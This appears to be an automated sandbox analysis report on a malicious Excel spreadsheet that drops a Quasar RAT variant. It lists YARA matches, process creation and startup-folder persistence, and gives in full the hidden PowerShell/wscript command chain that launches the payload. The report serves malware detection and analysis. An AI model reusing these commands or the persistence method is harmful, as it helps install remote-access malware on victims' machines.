Source: 1.2.a.exe.3889990.2.raw.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 20.2.a.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 11.2.a.exe.3b7c240.3.raw.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 11.2.a.exe.3969990.2.raw.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 1.2.a.exe.39bc1e0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 17.2.a.exe.3c9c240.3.raw.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 1.2.a.exe.3a9c240.3.raw.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.a.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/

Source: 13.2.a.exe.400000.0.unpack, oXs/KX8.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 13.2.a.exe.400000.0.unpack, oXs/KX8.cs	Cryptographic APIs: 'CreateDecryptor'

Source: classification engine

Classification label: mal100.troj.adwa.spyw.expl.evad.winXLS@21/14@13/5

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6616:120:WilError_01
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Mutant created: \Sessions\1\BaseNamedObjects\Kdjaq

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\{1430B6D9-1049-4B57-9D78-04A0226B6D97} - OProcSessId.dat

Jump to behavior

Source: LIQUIDACION INTERBANCARIA 02_22_2021.xls

OLE indicator, Workbook stream: true

Source: C:\ProgramData\a.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM WIN32_PROCESSOR

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\ProgramData\a.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\ProgramData\a.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\ProgramData\a.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	File read: C:\Windows\System32\drivers\etc\hosts

Source: unknown	Process created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
Source: unknown	Process created: C:\ProgramData\a.exe C:\PROGRAMDATA\a.exe
Source: unknown	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c timeout 4 & 'C:\Windows\System32\wscript.exe' 'C:\Users\user\AppData\Local\Temp\\499262.js' && powershell -command Start-Sleep -s 4; Start-Process -WindowStyle hidden -FilePath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe'
Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\SysWOW64\timeout.exe timeout 4
Source: unknown	Process created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\wscript.exe' 'C:\Users\user\AppData\Local\Temp\\499262.js'
Source: unknown	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -command Start-Sleep -s 4; Start-Process -WindowStyle hidden -FilePath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe'
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe'
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe'
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process created: C:\ProgramData\a.exe C:\PROGRAMDATA\a.exe	Jump to behavior
Source: C:\ProgramData\a.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c timeout 4 & 'C:\Windows\System32\wscript.exe' 'C:\Users\user\AppData\Local\Temp\\499262.js' && powershell -command Start-Sleep -s 4; Start-Process -WindowStyle hidden -FilePath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe'	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout 4	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\wscript.exe' 'C:\Users\user\AppData\Local\Temp\\499262.js'	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -command Start-Sleep -s 4; Start-Process -WindowStyle hidden -FilePath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe'	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe'	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe

Source: C:\ProgramData\a.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\ProgramData\a.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages

Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File opened: C:\Windows\SysWOW64\MSVCR100.dll

Jump to behavior

Source:	Binary string: /_/Src/Newtonsoft.Json/obj/Release/net40/Newtonsoft.Json.pdbSHA256f source: a.exe, 0000000D.00000003.896472012.0000000003F60000.00000004.00000001.sdmp
Source:	Binary string: C:\Users\Administrator\Desktop\CalcFis\obj\Debug\CalcFis.pdb source: a.exe, mensajeria_system[1].exe.0.dr
Source:	Binary string: /_/Src/Newtonsoft.Json/obj/Release/net40/Newtonsoft.Json.pdb source: a.exe, 0000000D.00000003.896472012.0000000003F60000.00000004.00000001.sdmp

Data Obfuscation:

.NET source code contains method to dynamically call methods (often used by packers)

Show sources

Source: 13.2.a.exe.400000.0.unpack, oXs/KX8.cs

.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)

.NET source code contains potential unpacker

Show sources

Source: 1.2.a.exe.410000.0.unpack, Form2.cs	.Net Code: akldwjhaf System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 1.0.a.exe.410000.0.unpack, Form2.cs	.Net Code: akldwjhaf System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 11.0.a.exe.540000.0.unpack, Form2.cs	.Net Code: akldwjhaf System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 11.2.a.exe.540000.0.unpack, Form2.cs	.Net Code: akldwjhaf System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 12.0.a.exe.270000.0.unpack, Form2.cs	.Net Code: akldwjhaf System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 12.2.a.exe.270000.0.unpack, Form2.cs	.Net Code: akldwjhaf System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 13.2.a.exe.a90000.1.unpack, Form2.cs	.Net Code: akldwjhaf System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 13.0.a.exe.a90000.0.unpack, Form2.cs	.Net Code: akldwjhaf System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 17.2.a.exe.5b0000.0.unpack, Form2.cs	.Net Code: akldwjhaf System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])

Suspicious powershell command line found

Show sources

Source: unknown	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -command Start-Sleep -s 4; Start-Process -WindowStyle hidden -FilePath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe'
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -command Start-Sleep -s 4; Start-Process -WindowStyle hidden -FilePath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe'			Jump to behavior

Yara detected Beds Obfuscator

Show sources

Source: Yara match	File source: 00000011.00000002.876240165.0000000007590000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.710604971.0000000003889000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.775905725.0000000003969000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.715456049.0000000006E20000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.854642346.0000000003A89000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.789219576.0000000007530000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: a.exe PID: 6200, type: MEMORY
Source: Yara match	File source: Process Memory Space: a.exe PID: 6772, type: MEMORY
Source: Yara match	File source: Process Memory Space: a.exe PID: 740, type: MEMORY
Source: Yara match	File source: 1.2.a.exe.6e20000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.a.exe.7530000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.a.exe.3a89990.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.a.exe.3889990.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.a.exe.3969990.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.a.exe.3a89990.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.a.exe.7590000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.a.exe.3969990.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.a.exe.7590000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.a.exe.6e20000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.a.exe.3889990.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.a.exe.7530000.5.raw.unpack, type: UNPACKEDPE

Yara detected Costura Assembly Loader

Show sources

Source: Yara match	File source: 0000000B.00000002.777758927.0000000003B6D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.947711194.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.710965832.0000000003A90000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.710604971.0000000003889000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.853281517.00000000039A1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.775905725.0000000003969000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.858549049.0000000003C8C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.775433502.0000000003881000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.870308701.0000000002EE1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.952842213.0000000002DF1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.854642346.0000000003A89000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.866618994.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: a.exe PID: 5036, type: MEMORY
Source: Yara match	File source: Process Memory Space: a.exe PID: 6200, type: MEMORY
Source: Yara match	File source: Process Memory Space: a.exe PID: 5508, type: MEMORY
Source: Yara match	File source: Process Memory Space: a.exe PID: 6772, type: MEMORY
Source: Yara match	File source: Process Memory Space: a.exe PID: 740, type: MEMORY
Source: Yara match	File source: 1.2.a.exe.39bc1e0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.a.exe.3a9c1e0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.a.exe.3a9c240.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.a.exe.3bbc1e0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.a.exe.3a89990.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.a.exe.3a9c1e0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.a.exe.3889990.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.a.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.a.exe.3b7c240.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.a.exe.3969990.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.a.exe.3b7c240.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.a.exe.39bc1e0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.a.exe.3c9c240.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.a.exe.3c9c240.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.a.exe.3a9c240.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.a.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.a.exe.3bbc1e0.2.unpack, type: UNPACKEDPE

Source: C:\ProgramData\a.exe	Code function: 1_2_00E640C1 push eax; retn 0004h	1_2_00E640C2
Source: C:\ProgramData\a.exe	Code function: 1_2_00E642DB pushad ; ret	1_2_00E642DE
Source: C:\ProgramData\a.exe	Code function: 1_2_00E64450 push 6C04C257h; ret	1_2_00E64455
Source: C:\ProgramData\a.exe	Code function: 1_2_00E6450F push edi; retn 0004h	1_2_00E64512
Source: C:\ProgramData\a.exe	Code function: 1_2_00E66940 push 9E4C04C2h; ret	1_2_00E66946
Source: C:\ProgramData\a.exe	Code function: 1_2_00E66910 push 9C8C04C2h; ret	1_2_00E6691E
Source: C:\ProgramData\a.exe	Code function: 1_2_00E6B168 pushfd ; retn 0004h	1_2_00E6B16A
Source: C:\ProgramData\a.exe	Code function: 1_2_00E69C98 pushfd ; ret	1_2_00E69CA6
Source: C:\ProgramData\a.exe	Code function: 1_2_00E6FF29 push esp; ret	1_2_00E6FF2E
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Code function: 13_2_0541EA3B push 8B0541EBh; retf	13_2_0541EA47
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Code function: 13_2_06900998 pushad ; iretd	13_2_06901631
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Code function: 13_2_0690F6D2 push eax; iretd	13_2_0690F6D9
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Code function: 13_2_06E07F5B push esp; retf	13_2_06E07F5C

Persistence and Installation Behavior:

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	File created: C:\ProgramData\a.exe			Jump to dropped file
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\mensajeria_system[1].exe			Jump to dropped file

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File created: C:\ProgramData\a.exe

Jump to dropped file

Boot Survival:

Drops PE files to the startup folder

Show sources

Source: C:\Windows\SysWOW64\wscript.exe

PE file moved: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe

Jump to behavior

Drops PE files to the user root directory

Show sources

Source: C:\Windows\SysWOW64\wscript.exe

PE file moved: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe

Jump to behavior

Hooking and other Techniques for Hiding and Protection:

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
